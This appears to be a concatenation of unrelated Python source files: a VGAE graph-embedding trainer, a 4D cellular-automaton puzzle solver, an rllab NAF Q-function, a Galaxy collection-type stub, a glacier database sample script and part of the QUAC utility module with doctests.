self.adj_train, self.train_edges, self.val_edges, self.val_edges_false, self.test_edges, self.test_edges_false = r
# g = open("./data/title and description/VGAE.pkl", 'rb')
# adj_train, train_edges, val_edges, val_edges_false, test_edges, test_edges_false = pickle.load(g)
# g.close()
self.adj = self.adj_train
# Some preprocessing
self.adj_norm = preprocess_graph(self.adj)
self.adj_label = self.adj_train + sp.eye(self.adj_train.shape[0])
# adj_label = sparse_to_tuple(adj_label)
self.adj_label = torch.FloatTensor(self.adj_label.toarray())
self.pos_weight = torch.Tensor([float(self.adj.shape[0] * self.adj.shape[0] - self.adj.sum()) / self.adj.sum()])
self.norm = self.adj.shape[0] * self.adj.shape[0] / float((self.adj.shape[0] * self.adj.shape[0] - self.adj.sum()) * 2)
def build_model(self):
self.model = GCNModelVAE(self.feat_dim, self.hidden1, self.hidden2, self.dropout)
self.optimizer = optim.Adam(self.model.parameters(), lr=self.lr)
def train(self, epochs):
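        # Standard VGAE training loop: split the edges into train/val/test
        # sets, build the model, optimize the VGAE objective (reconstruction
        # plus KL term), report validation ROC/AP each epoch, then dump the
        # latent means (mu) as node embeddings to <embedding_path>/VGAE.nv.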
self.sample_graph()
self.build_model()
self.hidden_emb = None
print("VGAE Start Training")
for epoch in range(epochs):
t = time.time()
self.model.train()
self.optimizer.zero_grad()
self.recovered, self.mu, self.logvar = self.model(self.features, self.adj_norm)
self.loss = loss_function(preds=self.recovered, labels=self.adj_label,
mu=self.mu, logvar=self.logvar, n_nodes=self.n_nodes,
norm=self.norm, pos_weight=self.pos_weight)
self.loss.backward()
self.optimizer.step()
self.cur_loss = self.loss.item()
self.hidden_emb = self.mu.data.numpy()
print(self.hidden_emb)
self.roc_curr, self.ap_curr = get_roc_score(self.hidden_emb, self.adj_orig, self.val_edges, self.val_edges_false)
print("Epoch:", '%04d' % (epoch + 1), "train_loss=", "{:.5f}".format(self.cur_loss),
"val_ap=", "{:.5f}".format(self.ap_curr),
"time=", "{:.5f}".format(time.time() - t)
)
f = open("{}/VGAE.nv".format(self.embedding_path), "w")
f.write(" ".join([str(x) for x in self.hidden_emb.shape]))
f.write("\n")
for i in range(self.hidden_emb.shape[0]):
d = " ".join([str(x) for x in self.hidden_emb[i]])
f.write("{} {}\n".format(str(i), d))
f.close()
print("VGAE Optimization Finished!\n")
def build_vgae(g, path, configs):
vgae = VGAE(g, path, configs)
vgae.train(epochs)
embedding = load_embedding("{}/VGAE.nv".format(path))
return embedding
|
from collections import defaultdict
from copy import deepcopy
import os
import re
dx = [-1, 0, 1]
dy = [-1, 0, 1]
dz = [-1, 0, 1]
dw = [-1, 0, 1]
def process(x, y, z, w, system):
current_value, neighbours = system[(x, y, z, w)], ""
for x2 in dx:
for y2 in dy:
for z2 in dz:
for w2 in dw:
                    # Skip the cell itself; every offset where not all of the
                    # deltas are zero is a neighbour.
                    if (x2, y2, z2, w2) != (0, 0, 0, 0):
                        neighbours += system[(x + x2, y + y2, z + z2, w + w2)]
active = neighbours.count("#")
if (current_value == "#" and active in [2, 3]) or (
current_value == "." and active == 3
):
return "#"
return "."
def boot(system, is_part1):
for cycle in range(6):
expansion = cycle + 1
next_system = deepcopy(system)
w_range_start = 0 if is_part1 else -expansion
w_range_stop = 1 if is_part1 else expansion + 1
for w in range(w_range_start, w_range_stop):
for z in range(-expansion, 1 + expansion):
for y in range(-expansion, len(lines) + expansion):
for x in range(-expansion, len(lines[0]) + expansion):
next_system[(x, y, z, w)] = process(x, y, z, w, system)
system = deepcopy(next_system)
return sum([1 for cell in system.values() if cell == "#"])
with open(os.path.join(os.path.dirname(__file__), "input.txt"), "r") as file:
lines = [l.strip() for l in file.readlines()]
system = defaultdict(lambda: ".")
for y, row in enumerate(lines):
for x, cell in enumerate(row):
system[(x, y, 0, 0)] = cell
print(f"Part 1: {boot(system, True)}") # 319
print(f"Part 2: {boot(system, False)}") # 2324
|
from sandbox.rocky.tf.q_functions.base import QFunction
import sandbox.rocky.tf.core.layers as L
import tensorflow as tf
import numpy as np
from rllab.core.serializable import Serializable
from sandbox.rocky.tf.core.layers_powered import LayersPowered
from sandbox.rocky.tf.misc import tensor_utils
from sandbox.rocky.tf.policies.base import StochasticPolicy
class NAFMLPQFunction(QFunction, LayersPowered, Serializable):
def __init__(
self,
env_spec,
name='nafqnet',
hidden_sizes=(32, 32),
hidden_nonlinearity=tf.nn.relu,
action_merge_layer=0,
output_nonlinearity=None,
hidden_W_init=L.XavierUniformInitializer(),
hidden_b_init=L.ZerosInitializer(),
output_W_init=L.XavierUniformInitializer(),
output_b_init=L.ZerosInitializer(),
bn=False):
Serializable.quick_init(self, locals())
assert not env_spec.action_space.is_discrete
action_dim = env_spec.action_space.flat_dim
self._action_dim = action_dim
self._env_spec = env_spec
n_layers = len(hidden_sizes)
action_merge_layer = \
(action_merge_layer % n_layers + n_layers) % n_layers
with tf.variable_scope(name):
l_obs = L.InputLayer(shape=(None, env_spec.observation_space.flat_dim), name="obs")
l_action = L.InputLayer(shape=(None, env_spec.action_space.flat_dim), name="actions")
l_policy_mu = L.InputLayer(shape=(None, action_dim), name="policy_mu")
l_policy_sigma = L.InputLayer(shape=(None, action_dim, action_dim), name="policy_sigma")
l_hidden = l_obs
idx = 0
l_hidden_kwargs = dict(
W=hidden_W_init,
b=hidden_b_init,
nonlinearity=hidden_nonlinearity,
)
l_output_kwargs = dict(
W=output_W_init,
b=output_b_init,
)
while idx < action_merge_layer:
if bn: l_hidden = L.batch_norm(l_hidden)
l_hidden = L.DenseLayer(
l_hidden,num_units=hidden_sizes[idx],
name="h%d" % (idx + 1), **l_hidden_kwargs,)
idx += 1
_idx = idx
_l_hidden = l_hidden
# compute L network
while idx < n_layers:
if bn: l_hidden = L.batch_norm(l_hidden)
l_hidden = L.DenseLayer(
l_hidden,num_units=hidden_sizes[idx],
name="L_h%d" % (idx + 1), **l_hidden_kwargs,)
idx += 1
l_L = L.DenseLayer(
l_hidden,num_units=action_dim**2, nonlinearity=None,
name="L_h%d" % (idx + 1), **l_output_kwargs,)
# compute V network
idx = _idx
l_hidden = _l_hidden
while idx < n_layers:
if bn: l_hidden = L.batch_norm(l_hidden)
l_hidden = L.DenseLayer(
l_hidden,num_units=hidden_sizes[idx],
name="V_h%d" % (idx + 1), **l_hidden_kwargs,)
idx += 1
l_V = L.DenseLayer(
l_hidden,num_units=1, nonlinearity=None,
name="V_h%d" % (idx + 1), **l_output_kwargs,)
# compute mu network
idx = _idx
l_hidden = _l_hidden
while idx < n_layers:
if bn: l_hidden = L.batch_norm(l_hidden)
l_hidden = L.DenseLayer(
l_hidden,num_units=hidden_sizes[idx],
name="mu_h%d" % (idx + 1), **l_hidden_kwargs,)
idx += 1
if bn: l_hidden = L.batch_norm(l_hidden)
l_mu = L.DenseLayer(
l_hidden,num_units=action_dim, nonlinearity=tf.nn.tanh,
name="mu_h%d" % (idx + 1), **l_output_kwargs,)
L_var, V_var, mu_var = L.get_output([l_L, l_V, l_mu], deterministic=True)
V_var = tf.reshape(V_var, (-1,))
# compute advantage
L_mat_var = self.get_L_sym(L_var)
P_var = self.get_P_sym(L_mat_var)
A_var = self.get_A_sym(P_var, mu_var, l_action.input_var)
# compute Q
Q_var = A_var + V_var
# compute expected Q under Gaussian policy
e_A_var = self.get_e_A_sym(P_var, mu_var, l_policy_mu.input_var, l_policy_sigma.input_var)
e_Q_var = e_A_var + V_var
self._f_qval = tensor_utils.compile_function([l_obs.input_var, l_action.input_var], Q_var)
self._f_e_qval = tensor_utils.compile_function([l_obs.input_var, l_policy_mu.input_var,
l_policy_sigma.input_var], e_Q_var)
self._L_layer = l_L
self._V_layer = l_V
self._mu_layer = l_mu
self._obs_layer = l_obs
self._action_layer = l_action
self._policy_mu_layer = l_policy_mu
self._policy_sigma_layer = l_policy_sigma
self._output_nonlinearity = output_nonlinearity
self.init_policy()
LayersPowered.__init__(self, [l_L, l_V, l_mu])
def init_policy(self):
pass
def get_L_sym(self, L_vec_var):
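        # Rebuild a lower-triangular matrix from the flat output vector and
        # exponentiate its diagonal, so that P = L L^T below is positive
        # definite (the usual NAF parameterization of the advantage term).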
L = tf.reshape(L_vec_var, (-1, self._action_dim, self._action_dim))
return tf.matrix_band_part(L, -1, 0) - \
tf.matrix_diag(tf.matrix_diag_part(L)) + \
tf.matrix_diag(tf.exp(tf.matrix_diag_part(L)))
def get_P_sym(self, L_mat_var):
return tf.matmul(L_mat_var, tf.matrix_transpose(L_mat_var))
def get_e_A_sym(self, P_var, mu_var, policy_mu_var, policy_sigma_var):
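        # Expected advantage under a Gaussian policy N(mu_pi, Sigma):
        # E[A(s, a)] = A(s, mu_pi) - 0.5 * tr(P Sigma), evaluated per sample.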
e_A_var1 = self.get_A_sym(P_var, mu_var, policy_mu_var)
e_A_var2 = - 0.5 * tf.reduce_sum(tf.matrix_diag_part(
tf.matmul(P_var, policy_sigma_var)), 1)
#e_A_var2 = - 0.5 * tf.trace(tf.matmul(P_var, policy_sigma_var))
return e_A_var1 + e_A_var2
def get_A_sym(self, P_var, mu_var, action_var):
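        # Quadratic advantage A(s, a) = -0.5 * (a - mu(s))^T P(s) (a - mu(s)).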
delta_var = action_var - mu_var
delta_mat_var = tf.reshape(delta_var, (-1, self._action_dim, 1))
P_delta_var = tf.squeeze(tf.matmul(P_var, delta_mat_var),[2])
return -0.5 * tf.reduce_sum(delta_var * P_delta_var, 1)
def get_qval(self, observations, actions):
qvals = self._f_qval(observations, actions)
return qvals
def get_output_sym(self, obs_var, **kwargs):
L_var, V_var, mu_var = L.get_output(
[self._L_layer, self._V_layer, self._mu_layer],
{self._obs_layer: obs_var},
**kwargs
)
V_var = tf.reshape(V_var, (-1,))
return L_var, V_var, mu_var
def _get_qval_sym(self, obs_var, action_var, **kwargs):
L_var, V_var, mu_var = self.get_output_sym(obs_var, **kwargs)
L_mat_var = self.get_L_sym(L_var)
P_var = self.get_P_sym(L_mat_var)
A_var = self.get_A_sym(P_var, mu_var, action_var)
Q_var = A_var + V_var
return Q_var, A_var, V_var
def get_qval_sym(self, obs_var, action_var, **kwargs):
return self._get_qval_sym(obs_var, action_var, **kwargs)[0]
def get_e_qval(self, observations, policy):
if isinstance(policy, StochasticPolicy):
agent_info = policy.dist_info(observations)
mu, log_std = agent_info['mean'], agent_info["log_std"]
std = np.array([np.diag(x) for x in np.exp(log_std)], dtype=log_std.dtype)
qvals = self._f_e_qval(observations, mu, std)
else:
actions, _ = policy.get_actions(observations)
qvals = self.get_qval(observations, actions)
return qvals
def get_e_qval_sym(self, obs_var, policy, **kwargs):
if isinstance(policy, StochasticPolicy):
agent_info = policy.dist_info_sym(obs_var)
mu, log_std = agent_info['mean'], agent_info["log_std"]
std = tf.matrix_diag(tf.exp(log_std))
L_var, V_var, mu_var = self.get_output_sym(obs_var, **kwargs)
L_mat_var = self.get_L_sym(L_var)
P_var = self.get_P_sym(L_mat_var)
A_var = self.get_e_A_sym(P_var, mu_var, mu, std)
qvals = A_var + V_var
else:
mu = policy.get_action_sym(obs_var)
qvals = self.get_qval_sym(obs_var, mu, **kwargs)
return qvals
def get_cv_sym(self, obs_var, action_var, policy, **kwargs):
#_, avals, _ = self._get_qval_sym(obs_var, action_var, **kwargs)
qvals = self.get_qval_sym(obs_var, action_var, **kwargs)
e_qvals = self.get_e_qval_sym(obs_var, policy, **kwargs)
avals = qvals - e_qvals
return avals
|
from galaxy import exceptions
from abc import ABCMeta
from abc import abstractmethod
from galaxy import model
import logging
log = logging.getLogger( __name__ )
class DatasetCollectionType(object):
__metaclass__ = ABCMeta
@abstractmethod
def generate_elements( self, dataset_instances ):
""" Generate DatasetCollectionElements with corresponding
to the supplied dataset instances or throw exception if
this is not a valid collection of the specified type.
"""
class BaseDatasetCollectionType( DatasetCollectionType ):
def _validation_failed( self, message ):
raise exceptions.ObjectAttributeInvalidException( message )
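# A minimal, hypothetical concrete type is sketched below (commented out).
# The real implementations live elsewhere in Galaxy; the element identifiers
# and the model.DatasetCollectionElement signature used here are assumptions
# for illustration only.
#
# class PairedDatasetCollectionType( BaseDatasetCollectionType ):
#     def generate_elements( self, dataset_instances ):
#         if len( dataset_instances ) != 2:
#             self._validation_failed( "Paired collections require exactly two datasets." )
#         forward, reverse = dataset_instances
#         yield model.DatasetCollectionElement( element=forward, element_identifier="forward" )
#         yield model.DatasetCollectionElement( element=reverse, element_identifier="reverse" )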
|
'''
Created on 12.07.2018
@author: yvo
Sample script showing a polymorphic approach to retrieving attribute
data of glaciers from the database.
'''
import configparser
import inspect
import sys
from dataflow.DataReaders.DatabaseReaders.GlacierReader import GlacierReader
from dataflow.DataReaders.DatabaseReaders.VolumeChangeReader import VolumeChangeReader
from dataflow.DataReaders.DatabaseReaders.LengthChangeReader import LengthChangeReader
from dataflow.DataReaders.DatabaseReaders.MassBalanceReader import MassBalanceReader
def printMassBalanceDataFrames(glaciers):
for glacier in glaciers.values():
print("---")
print(glacier)
# Check the availability of mass-balance object for inspection and printing the data-frame.
if len(glacier.massBalances.values()):
print("Available columns and their documentations:")
for column in list(glacier.massBalanceDataFrame):
docColumn = "Documentation not available yet"
# TODO: Getting the doc string of the columns of the data frame by inspecting the members of a MassBalance object.
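                # One possible sketch (untested, and assuming a MassBalance
                # class with documented properties named like the data-frame
                # columns were imported here):
                #   member = getattr(MassBalance, column, None)
                #   if member is not None and inspect.getdoc(member):
                #       docColumn = inspect.getdoc(member)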
print("- {0}: {1}".format(column, docColumn))
print(glacier.massBalanceDataFrame)
if __name__ == '__main__':
config = configparser.ConfigParser()
config.read("dataflow.cfg")
privateDatabaseAccessConfiguration = r".\databaseAccessConfiguration.gldiro.cfg"
    print(privateDatabaseAccessConfiguration + ' will be used to access the database')
focusGlaciers = ['C14-10', 'B36-26', 'B83-03'] # Basodino (VAW-ID = 104), Aletsch (VAW-ID = 5), Corbassiere (VAW-ID = 38)
# Getting the dataflow.DataReaders.DatabaseReaders.GlacierReader ready to retrieve glacier objects from the database.
glacierReader = GlacierReader(privateDatabaseAccessConfiguration)
    # Empty dictionary for the found focus glaciers.
glaciers = dict()
# Getting all the data readers for the attribute values of the glaciers ready.
dataReaders = []
dataReaders.append(MassBalanceReader(privateDatabaseAccessConfiguration))
try:
# Check if the database is available. If not, get alternative glaciers for plotting.
        if glacierReader.isDatabaseAvailable:
print("The GLAMOS database is available. Glacier objects are read from the database.")
for focusGlacier in focusGlaciers:
glacierFound = glacierReader.getGlacierBySgi(focusGlacier)
glaciers[glacierFound.pkSgi] = glacierFound
# Getting the attributes from the database.
for glacier in glaciers.values():
                # Polymorphic approach to reading attribute data via a list of readers.
for dataReader in dataReaders:
dataReader.getData(glacier)
# Printing the pandas.DataFrame of the mass-balances of the glaciers.
printMassBalanceDataFrames(glaciers)
else:
print("Database not available! Application will terminate.")
sys.exit(2)
except Exception as e:
        print(e)
print("Sample script aborted!")
|
# -*- coding: utf-8 -*-
'''
Utility routines, classes, etc. A catch-all.
BUGS / WARNINGS / FIXME:
* This module keeps references to the config and logger objects it returns,
and then uses them, so the caller should take care to not somehow acquire
different ones.'''
# Copyright (c) Los Alamos National Security, LLC, and others.
import argparse
import codecs
import collections
import configparser
import cProfile
from datetime import datetime, timedelta
import distutils.spawn
import glob
import gzip
import functools
import inspect
import io
import itertools
import heapq
import logging
import os
import os.path
import pickle
import platform
from pprint import pprint
import psutil
import pytz
import random
import re
import resource
import shlex
import socket
import subprocess
import sys
import time
import urllib.parse
import uuid
import numpy as np
import multicore
import testable
### Constants ###
PICKLE_SUFFIX = '.pkl.gz'
WGS84_SRID = 4326 # FIXME: redundantly defined in geo/srs.py
CONFIG_DEFAULT = os.path.expanduser('~/.quacrc')
### Globals ###
# These are set to real values on import (i.e., below), so you can do
# something like:
#
# import u
# c = u.c
# l = u.l
c = None # config object; set after class def and populated in configure()
l = None # logging object; see EOF for default
cpath = None # path of configuration file on the command line
# Root of QUAC installation (set below since we need module_dir)
quacbase = None
# A random number generator with known seed. Re-seeded in parse_args().
rand = random.Random(8675309)
rand_np = np.random.mtrand.RandomState(8675309)
# Used for silencing stdout; see stdout_silence() below.
stdout_copy_fno = None
# Python apparently doesn't set the locale correctly on stdout when it's a
# pipe, so this hack gives us a file object that can print UTF8 to stdout
# regardless.
utf8_stdout = codecs.getwriter('utf8')(sys.stdout)
# Should chatter be verbose? Set in parse_args().
verbose = False
# Should chatter include timestamps? Set in parse_args().
log_timestamps = True
### Environment ###
# We require a minimum Python version.
assert (sys.version_info >= (3,4))
# Use a consistent, widely available, boring locale.
os.environ['LC_ALL'] = 'C'
# Some parts of QUAC need lots of files open.
fl = resource.getrlimit(resource.RLIMIT_NOFILE)
resource.setrlimit(resource.RLIMIT_NOFILE, (2048, fl[1]))
### Classes ###
class Accumulator(object):
'''Memory-efficient class which accumulates a sum and can compute its mean.
There is also a threshold for minimum number of items before mean
becomes non-zero. For example:
>>> a = Accumulator(min_count=3)
>>> a.mean
0.0
>>> a.add(1)
>>> a.add(2)
>>> a.mean
0.0
>>> a.add(3)
>>> a.sum_
6.0
>>> a.count
3
>>> a.mean
2.0'''
__slots__ = ('sum_', 'count', 'min_count')
def __init__(self, sum_=0.0, count=0, min_count=1):
self.sum_ = sum_
self.count = count
self.min_count = min_count
@property
def mean(self):
if (self.count < self.min_count):
return 0.0
else:
return (self.sum_/self.count)
def add(self, x):
self.sum_ += x
self.count += 1
class ArgumentParser(argparse.ArgumentParser):
'''Add a few arguments common to all QUAC scripts. A group called
"functionality" is available in .default_group; an additional group of
common options is added at the end in parse_args().'''
def __init__(self, **kw):
kw.update({ 'add_help': False,
'formatter_class': argparse.RawTextHelpFormatter })
super(ArgumentParser, self).__init__(**kw)
self.default_group = self.add_argument_group('functionality')
def parse_args(self, args):
gr = self.add_argument_group('generic options')
gr.add_argument(
'-h', '--help',
action='help',
help='show this help message and exit')
gr.add_argument(
'--config',
metavar='FILE',
help='configuration file')
gr.add_argument(
'--notimes',
action='store_true',
help='omit timestamps from log messages (useful for testing)')
gr.add_argument(
'--unittest',
nargs=0,
action=testable.Raise_Unittest_Exception,
help='run unit tests instead of doing real stuff')
gr.add_argument(
'--verbose',
action='store_true',
help='be more verbose with log output')
return super(ArgumentParser, self).parse_args(args)
class MyConfigParser(configparser.ConfigParser):
def getpath(self, section, key, rel_file=None):
'''Return absolutized version of path at key; if specified, the path is
relative to rel_file, otherwise it's relative to the configuration
file.'''
if (rel_file is None):
rel_file = cpath
return abspath(self.get(section, key), rel_file)
def getlist(self, section, key):
return self.get(section, key).split()
c = MyConfigParser(inline_comment_prefixes=['#'])
class Priority_Queue(object):
'''Priority queue with bounded size.
Create and add first three items:
>>> pq = Priority_Queue(3)
>>> pq
PQ(3, [])
>>> len(pq)
0
>>> pq.add(1, 'a')
>>> pq
PQ(3, [(1, 'a')])
>>> len(pq)
1
>>> pq.add(3, 'b')
>>> pq.add(2, 'c')
>>> pq
PQ(3, [(1, 'a'), (3, 'b'), (2, 'c')])
>>> len(pq)
3
Higher-priority value goes in, lowest is removed:
>>> pq.add(4, 'd')
>>> pq
PQ(3, [(2, 'c'), (3, 'b'), (4, 'd')])
Lower-priority value never goes in:
>>> pq.add(1, 'e')
>>> pq
PQ(3, [(2, 'c'), (3, 'b'), (4, 'd')])
No pop operation yet, but you can iterate through the items in various
ways. Note that these are in arbitrary order, not priority order.
>>> list(pq.items())
[(2, 'c'), (3, 'b'), (4, 'd')]
>>> list(pq.priorities())
[2, 3, 4]
>>> list(pq.values())
['c', 'b', 'd']
Two queues can be merged into a new queue if their limits are the same.
This keeps the maximum priority items.
>>> pq2 = Priority_Queue(2)
>>> pq.merge(pq2)
Traceback (most recent call last):
...
ValueError: cannot merge queues with different limits
>>> pq3 = Priority_Queue(3)
>>> pq3.add(3, 'e')
>>> pq3.add(5, 'f')
>>> pq3
PQ(3, [(3, 'e'), (5, 'f')])
>>> pq.merge(pq3)
PQ(3, [(3, 'b'), (4, 'd'), (5, 'f')])
Unlimited also an option (limit becomes sys.maxsize):
>>> Priority_Queue()
PQ(9223372036854775807, [])
It's OK if items can't be compared. Many NumPy and Pandas data types
have this property. (Note the strange exception when we try; see
<http://stackoverflow.com/questions/32342292/> for an explanation.)
>>> a = np.arange(2)
>>> b = np.arange(2)
>>> (1, a) > (1, pq)
Traceback (most recent call last):
...
ValueError: The truth value of an array with more than one element is ambiguous. Use a.any() or a.all()
>>> pq = Priority_Queue(3)
>>> pq.add(1, a)
>>> pq.add(1, b)
Limit must be at least 1:
>>> Priority_Queue(1)
PQ(1, [])
>>> Priority_Queue(0)
Traceback (most recent call last):
...
ValueError: limit 0 is not greater than zero
>>> Priority_Queue(-1)
Traceback (most recent call last):
...
ValueError: limit -1 is not greater than zero'''
# Items can be non-comparable, so we need a tie-breaker. The simple
# solution (recommended by the heapq docs) is to simply count queue
# insertions; however, in our case, this breaks down because we need to be
# able to merge queues. So, we use a hack based on low bits of the MAC
# address and PID to grope towards uniqueness. This assumes 64-bit integers
# and 16-bit PIDs, and all queues in the same process use the same
# sequence.
add_ct = ( os.getpid() << 48
^ (uuid.getnode() & 0xffffffff) << 32)
def __init__(self, limit=None):
self.heap = list()
if (limit is None):
self.limit = sys.maxsize
elif (limit <= 0):
raise ValueError('limit %d is not greater than zero' % limit)
else:
self.limit = limit
def __len__(self):
return len(self.heap)
def __repr__(self):
return 'PQ(%d, %s)' % (self.limit, repr(list(self.items())))
def add(self, priority, value):
assert (len(self.heap) <= self.limit)
# Silently ignore NaN priorities, because they can't be ordered.
if (np.isnan(priority)):
return
if (len(self.heap) == self.limit):
# Queue full. This insertion is a no-op if the priority is below
# everything already on the heap (I looked at the source code).
heapq.heappushpop(self.heap, (priority, self.add_ct, value))
else:
# Queue not full.
#print(len(self.heap), priority, item)
heapq.heappush(self.heap, (priority, self.add_ct, value))
self.add_ct += 1
def items(self):
return ((p, v) for (p, t, v) in self.heap)
def merge(self, other):
if (self.limit != other.limit):
raise ValueError('cannot merge queues with different limits')
new = self.__class__(self.limit)
new.heap = heapq.nlargest(self.limit,
itertools.chain(self.heap, other.heap),
key=lambda pv: pv[0])
new.heap.reverse()
# new.heap is now sorted (see heapq.nlargest() docs), so it's also a
# heap and we need not heapq.heapify().
return new
def priorities(self):
return (p for (p, t, v) in self.heap)
def values(self):
return (v for (p, t, v) in self.heap)
class Profiler(object):
def __init__(self):
self.prof = cProfile.Profile()
self.prof.enable()
def stop(self, name):
self.prof.disable()
self.prof.dump_stats(name)
class defaultdict_recursive(collections.defaultdict):
'''defaultdict which autovivifies arbitrarily deeply. For example:
>>> a = defaultdict_recursive()
>>> a[1][1] = 1
>>> a[1][2][3] = 2
>>> pprint(a.keys())
dict_keys([1])
>>> pprint(a[1].keys())
dict_keys([1, 2])
>>> a[1][1]
1
>>> a[1][2][3]
2'''
# https://groups.google.com/forum/?fromgroups#!topic/comp.lang.python/lRnIhaJKZeo[1-25]
def __init__(self):
self.default_factory = type(self)
def as_dict(self):
'Return self as a regular dict. Useful if you are done autovifivying.'
return { k: v.as_dict() if isinstance(v, type(self)) else v
for (k, v) in self.items() }
class Deleted_To_Save_Memory(object):
'Placeholder for objects removed to save memory, to make errors clearer.'
pass
class Lock_Error(Exception):
"Raised when a lock can't be acquired."
pass
class No_Configuration_Read(Exception):
'Raised when the location of the config file is needed, but none was read.'
pass
### Functions ###
def abort(text, exc_info=False):
"""Log a fatal error and abort immediately. exc_info is interpreted as for
the logging functions; see
http://docs.python.org/library/logging.html#logging.debug. TLDR: pass
True and the function will figure out what the current exception is and
log a traceback."""
l.fatal(text, exc_info=exc_info)
sys.exit(1)
def abspath(path, rel_file=None):
'''Return an absolute version of (non-empty) path. Relative paths are
relative to the location of file rel_file (which need not actually
exist); if rel_file is None, then path must be absolute already. For
example:
>>> abspath('../lib', '/usr/bin/foo')
'/usr/lib'
>>> abspath('/usr/lib/../include', '/usr/bin/foo')
'/usr/include'
>>> abspath('/usr/lib/../include')
'/usr/include'
>>> abspath('../lib')
Traceback (most recent call last):
...
ValueError: relative path ../lib requires referent
>>> abspath('')
Traceback (most recent call last):
...
ValueError: empty path is invalid'''
if (len(path) == 0):
raise ValueError('empty path is invalid')
if (rel_file is None and path[0] != '/'):
raise ValueError('relative path %s requires referent' % (path))
if (path[0] == '/'):
return os.path.abspath(path)
else:
return os.path.abspath('%s/%s' % (os.path.dirname(rel_file), path))
def class_by_name(name):
'''Return a class given its fully qualified name.'''
# http://stackoverflow.com/questions/452969
parts = name.split('.')
mname = '.'.join(parts[:-1])
try:
m = __import__(mname)
for p in parts[1:]:
m = getattr(m, p)
return m
except (AttributeError, ValueError) as x:
raise ValueError('Can\'t import "%s": %s' % (name, str(x)))
def call_kw(f, *args, **kwargs):
'''Call f and return its return value, passing args as well as the kwargs
which are actually valid for f; this lets you call f with an arbitrary
kwargs even if f doesn't allow arbitrary kwargs. For example:
>>> def f(a, b=1, c=2):
... return ('%d %d %d' % (a, b, c))
>>> call_kw(f, 3, b=4, c=5, d=6)
'3 4 5'
Warning: args is *not* checked for matching the function signature. It
is probably a bad idea to use this wrapper to call functions with a
non-trivial mix of args and kwargs.'''
argspec = inspect.getargspec(f)
   defaults = argspec.defaults or ()
   valid_kwargs = set(argspec.args[-len(defaults):]) if defaults else set()
return f(*args, **{ k:v
for (k,v) in kwargs.items()
if k in valid_kwargs } )
def calling_module(frame_ct):
'''Return the module object frame_ct levels up in the stack. For example:
>>> calling_module(0)
<module 'u' from '.../lib/u.py'>
Note that what is frame_ct levels up must be a module, not a function or
something else. For example:
>>> calling_module(-1) # calling_module() itself
Traceback (most recent call last):
...
ValueError: stack level -1 is not a module
>>> calling_module(1) # somewhere in doctest
Traceback (most recent call last):
...
ValueError: stack level 1 is not a module'''
calling_frame = inspect.stack()[frame_ct+1][0]
try:
return sys.modules[calling_frame.f_locals['__name__']]
except KeyError:
raise ValueError('stack level %d is not a module' % (frame_ct))
def chunker(seq, p):
'''Split sequence seq into p more or less equal sized sublists. If p <
len(seq), then return len(seq) sublists of length 1. E.g.:
>>> chunker('abcdefghijklm', 3)
['abcde', 'fghi', 'jklm']
>>> chunker('abc', 4)
['a', 'b', 'c']
>>> chunker('', 1)
[]
See also groupn().'''
# based on http://code.activestate.com/recipes/425397
new = []
n = len(seq) // p # min items per subsequence
r = len(seq) % p # remaindered items
(b, e) = (0, n + min(1, r)) # first split
for i in range(min(p, len(seq))):
new.append(seq[b:e])
r = max(0, r-1) # use up remainders
(b, e) = (e, e + n + min(1, r)) # min(1,r) is always 0 or 1
return new
def config_read(filename):
'''Read the given configuration file. Abort with an error message if it
does not exist.'''
if (len(c.read(filename)) == 0):
abort('config file not found: %s' % (filename))
def configure(config_path):
"""Parse configuration files & return the config object; config_path is the
config file given on the command line. Also adjust the load path as
specified in the files."""
global cpath
config_read(abspath("../misc/default.cfg", __file__)) # 1. default.cfg
if (config_path is None):
if (os.path.exists(CONFIG_DEFAULT)):
config_read(CONFIG_DEFAULT)
else:
      # this needs to be an absolute path in case we change directories later
cpath = os.path.abspath(config_path)
config_read(cpath) # 2. from command line
next_config = c.get("path", "next_config")
if (next_config != ""):
assert False, "untested: if you need this, remove assertion & test :)"
config_read(next_config) # 3. chained from 2
return c
def copyupdate(template, updates):
'''Return a copy of dict template with updates applied. E.g.:
>>> a = {1:2, 3:4}
>>> copyupdate(a, {3:5, 5:6})
{1: 2, 3: 5, 5: 6}
>>> a
{1: 2, 3: 4}'''
r = template.copy()
r.update(updates)
return r
def dicts_merge(a, b):
'''Merge two dictionaries. If a key appears in both:
- If the values are:
- both mappings, they are merged recursively
- both lists, they are appended.
- equal, one or the other (arbitrarily) is used
- Otherwise, raise ValueError.
For example:
>>> pprint(dicts_merge({}, {}))
{}
>>> pprint(dicts_merge({1:2}, {}))
{1: 2}
>>> pprint(dicts_merge({1:2}, {3:4, 5:6}))
{1: 2, 3: 4, 5: 6}
>>> pprint(dicts_merge({1:{7:8}}, {1:{9:10}, 5:6}))
{1: {7: 8, 9: 10}, 5: 6}
>>> pprint(dicts_merge({1:[7,8]}, {1:[9,10], 5:6}))
{1: [7, 8, 9, 10], 5: 6}
>>> pprint(dicts_merge({1:2}, {1:2, 5:6}))
{1: 2, 5: 6}
>>> pprint(dicts_merge({1:2}, {1:4, 5:6}))
Traceback (most recent call last):
...
ValueError: Un-mergeable duplicate keys
>>> pprint(dicts_merge({1:{7:8}}, {1:4, 5:6}))
Traceback (most recent call last):
...
ValueError: Un-mergeable duplicate keys'''
c = dict()
keys = set(itertools.chain(a.keys(), b.keys()))
for k in keys:
if (k in a and k in b):
vals = (a[k], b[k])
if (all(isinstance(i, collections.abc.Mapping) for i in vals)):
c[k] = dicts_merge(a[k], b[k])
elif (all(isinstance(i, list) for i in vals)):
c[k] = a[k] + b[k]
elif (a[k] == b[k]):
c[k] = a[k]
else:
raise ValueError("Un-mergeable duplicate key %s: %s, %s"
% (k, a[k], b[k]))
elif (k in a):
c[k] = a[k]
else:
assert (k in b and not k in a)
c[k] = b[k]
return c
def domain():
'Return a guess at my domain name.'
return socket.getfqdn().split('.', 1)[1]
def glob_maxnumeric(dir_):
'''Given a directory that has zero or more files named only with digits,
return the largest integer in those filenames. If there are no such
filenames, return None.'''
names = glob.glob('%s/*' % (dir_))
r = re.compile(r'(^|/)([0-9]+)$')
try:
return max(int(m.group(2)) for m in (r.search(i) for i in names) if m)
except ValueError:
# no matches
return None
def groupn(iter_, n):
'''Generator which returns iterables containing n-size chunks of iterable
iter_; the final chunk may have size less than n (but not 0). Patterned
after <http://stackoverflow.com/a/3992918/396038>. E.g.:
>>> a = range(10)
>>> b = list(range(10))
>>> [list(i) for i in groupn(a, 3)]
[[0, 1, 2], [3, 4, 5], [6, 7, 8], [9]]
>>> [list(i) for i in groupn(b, 3)]
